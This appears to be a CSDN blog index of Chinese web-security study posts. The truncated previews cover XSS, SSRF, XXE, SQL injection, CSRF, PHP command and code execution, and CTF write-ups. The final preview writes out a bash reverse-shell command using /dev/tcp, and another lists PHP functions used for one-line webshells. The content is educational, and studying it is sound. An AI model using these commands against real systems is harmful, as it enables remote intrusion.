![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web安全学习
TGAO
这个作者很懒,什么都没留下…
展开
-
xss漏洞简述
1.xss漏洞简介XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比 如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨...原创 2019-04-05 00:43:14 · 2357 阅读 · 0 评论 -
ssrf
SSRF形成的原因是服务端提供了从其他服务器应用获取数据的功能,在用户可控的情况下,未对目标地址进行过滤与限制,导致此漏洞的产生。利用函数file_get_concents();fopen()和fpassthru();curl_exec();fsocksopen();1.php<?php$a=$_GET['a'];echo file_get_contents($a);?&...原创 2019-04-05 00:42:17 · 257 阅读 · 0 评论 -
xxe
1.如何甄别可能存在xxe最直接的回答就是: 甄别那些接受XML作为输入内容的端点。 但是有时候,这些端点可能并不是那么明显(比如,一些仅使用JSON去访问服务的客户端)。在这种情况下,渗透测试人员就必须尝试不同的测试方式,比如修改HTTP的请求方法,修改Content-Type头部字段等等方法,然后看看应用程序的响应,看看程序是否解析了发送的内容,如果解析了,那么则可能有XXE攻击漏洞。...原创 2019-04-05 00:41:25 · 399 阅读 · 0 评论 -
php parse_str()
一.pase_str()函数介绍实例把查询字符串解析到变量中:<?php parse_str("name=Bill&age=60"); echo $name."<br>"; echo $age; ?>运行实例定义和用法parse_str() 函数把查询字符串解析到变量中。注释:如果未设置 array 参数,则由该函数设置的变量将...原创 2019-04-05 00:42:55 · 749 阅读 · 0 评论 -
百度杯 "2017春秋欢乐赛 攻击"
打开题目网址,代码就被高亮出来<?phpheader("content-type:text/html;charset=utf-8");show_source(__FILE__);echo '<pre>';include('u/ip.php');include('flag.php');if (in_array($_SERVER['REMOTE_ADDR'],$ip...原创 2019-04-05 00:42:36 · 1020 阅读 · 0 评论 -
UpdateXml()mysql 报错注入
UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,String格式,替换查找到的符合条件的数据作...转载 2019-04-05 00:42:44 · 805 阅读 · 0 评论 -
文件解析漏洞
1.搭建平台2.命名规则IIS,Apache,Nginx存在解析漏洞ISS6.0文件正常文件地址:xxx:jpg触发解析文件地址:xxx.asp;.xxx.jpg(xx是随机字符;asp是解析格式,也就是可以为jsp,php的解析格式)文件夹正常文件夹地址:xxx/xxx.jpg触发解析文件夹地址:xxx.asp/xxx.jpg(xxx是随机字符;asp为解析格...原创 2019-04-05 00:43:03 · 338 阅读 · 0 评论 -
南邮 sql注入2
<?phpif($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $user = $_POST[user]; ...原创 2019-04-05 00:44:17 · 732 阅读 · 1 评论 -
php中防sql注入的一些简单php.ini配置与php函数
1.magic_quotes_gpc(魔术引号开关)magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。在magic_quotes_gpc = On的情况下,如果输入的数据有单引号(’)、双引号(”)、反斜线(...原创 2018-10-26 23:02:32 · 763 阅读 · 0 评论 -
php代码审计命令执行漏洞
命令执行漏洞,用户通过浏览器在远程服务器上执行任意系统命令,严格意义上,与代码执行漏洞还是有一定的区别。常用命令执行函数exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引号` 实际上是使用shell_exec()函数system() 输出并返回最后一行shell结果。exec()...原创 2019-04-05 00:44:23 · 800 阅读 · 1 评论 -
CSRF漏洞原理利用与防御
转自:http://www.cnblogs.com/hyddd/一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。二.CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。...转载 2019-04-05 00:43:56 · 1283 阅读 · 0 评论 -
php代码执行
PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞常见代码执行函数如eval()、assert()、preg_replace()、create_function()array_map()、call_user_func()、call_user_func_array(),array_filter,usort,uasort()文件操作函数、动态函数($a($b))...原创 2019-04-05 00:44:05 · 733 阅读 · 0 评论 -
php函数漏洞
1.intval()intval — 获取变量的整数值说明int intval ( mixed $var [, int $base = 10 ] )通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。参数var要转换成 integer 的...原创 2019-04-05 00:42:00 · 1776 阅读 · 0 评论 -
xxe漏洞原理与防御
xml基础知识要了解xxe漏洞,那么一定得先明白基础知识,了解xml文档的基础组成。另外php版本大于5.4.45的默认不解析外部实体XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素为什么使用 DTD?通过 DTD,您的每一个 X...原创 2019-04-05 00:43:26 · 15357 阅读 · 1 评论 -
第一次php代码审计
1.源代码 <?phprequire_once('flag.php');error_reporting(0);if(!isset($_GET['msg'])){ highlight_file(__FILE__); die();}@$msg = $_GET['msg'];if(@file_get_contents($msg)!=="Hello Chal...原创 2019-04-05 00:43:48 · 912 阅读 · 0 评论 -
简单理解SQL约束攻击
SQL约束攻击真正利用起来,存在以下的约束条件。服务端没有对用户名长度进行限制。如果服务端限制了用户名长度就不能导致数据库截断,也就没有利用条件。 登陆验证的SQL语句必须是用户名和密码一起验证。如果是验证流程是先根据用户名查找出对应的密码,然后再比对密码的话,那么也不能进行利用。因为当使用 Dumb为用户名来查询密码的话,数据库此时就会返回两条记录,而一般取第一条则是目标用户的记录,那么...转载 2019-04-05 00:44:30 · 348 阅读 · 2 评论 -
反弹shell
反弹shell语句bash -i >& /dev/tcp/ip/port 0>&1这句的意思是 首先将标准输出重定向/dev/tcp/ip/port也就是远程 然后再把标准输入重定向远程。然后就可以在远程输入输出了其中ip必须为公网Ipbash -i 在本地产生一个交互的bash环境>&的含义当>&后面接文...原创 2019-04-05 00:42:08 · 346 阅读 · 0 评论